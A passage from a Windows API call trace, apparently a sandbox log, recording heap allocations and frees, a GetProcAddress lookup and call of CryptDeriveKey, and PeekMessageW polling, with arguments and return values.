dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0245.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0245.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0245.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0245.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0245.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0245.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0245.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0245.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0245.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0245.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0245.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0245.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0245.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0245.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e513d0 [0245.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e513d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0245.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.219] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0245.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0245.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0245.220] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87690) returned 1 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0245.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0245.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0245.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0245.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0245.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0245.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0245.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0245.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0245.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0245.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0245.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0245.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0245.225] HeapFree 